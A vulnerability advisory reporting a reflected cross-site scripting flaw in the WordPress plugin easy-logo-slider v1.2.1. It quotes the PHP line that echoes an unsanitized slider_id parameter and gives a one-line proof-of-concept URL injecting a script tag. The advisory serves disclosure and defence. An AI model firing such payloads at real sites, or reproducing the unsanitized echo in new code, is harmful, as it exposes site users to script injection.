Advisory #: 513
Title: Reflected XSS in wordpress plugin easy-logo-slider v1.2.1
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/easy-logo-slider
Downloads: 34764
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: easy-logo-slider
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./easy-logo-slider/inc/logo_slider_create.php: 47: <input type="hidden" name="slider_id" id="slider_id" value="<?php echo $_GET['slider_id'];?>"> The variable slider_id appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./easy-logo-slider/inc/logo_slider_create.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/easy-logo-slider/inc/logo_slider_create.php?slider_id="><script>alert(1);</script><"